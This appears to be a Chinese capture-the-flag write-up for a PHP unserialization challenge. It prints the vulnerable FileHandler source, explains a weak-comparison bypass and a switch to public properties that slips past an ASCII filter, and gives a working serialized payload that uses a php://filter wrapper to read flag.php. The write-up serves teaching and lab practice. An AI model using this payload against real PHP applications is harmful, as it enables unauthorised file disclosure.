<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {//魔术字符
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {//op等于1时调用write()
$this->write();
} else if($this->op == "2") {//op等于2时res调用read()
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;//输出s
}
function __destruct() {
if($this->op === "2")//op强等于“2”字符型
$this->op = "1";//op变为“1”字符型
$this->content = "";//content变为空
$this->process();//执行process()
}
}
//is_valid()函数规定字符的ASCII码必须是32-125
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];//传入一个字符串str
if(is_valid($str)) {
$obj = unserialize($str);//对str进行反序列化操作
}
}
我们读完代码就可以了解这个代码的大概思路,就是总结下来我们需要使用read()去读取flag.php的内容。
那么思路就很简单了,毕竟最后进行了反序列化,那么我们肯定时要对php代码进行序列化的
由于魔术函数__destruct()当删除一个对象或对象操作终止时被调用。当我们进入这个网址的时候这个对象一定是被杀死了,那么一定是会执行这个魔术函数
__destruct()魔术方法中,op==="2"是强比较,而process()使用的是弱比较op=="2",可以通过弱类型绕过。绕过方法:op=2,这里的2是整数int类型,op=2时,op==="2"为false,op=="2"为true
is_valid()函数规定字符的ASCII码必须是32-125,而protected属性在序列化后会出现不可见字符\00*\00,转化为ASCII码不符合要求。PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过
那么我们来构造php代码
<?php
class FileHandler {
public $op = 2;
public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
public $content;
}
$a = new FileHandler();
echo serialize($a);
?>
?
?
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
构造payload
?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
?执行
去base64解密
?
得到flag?
|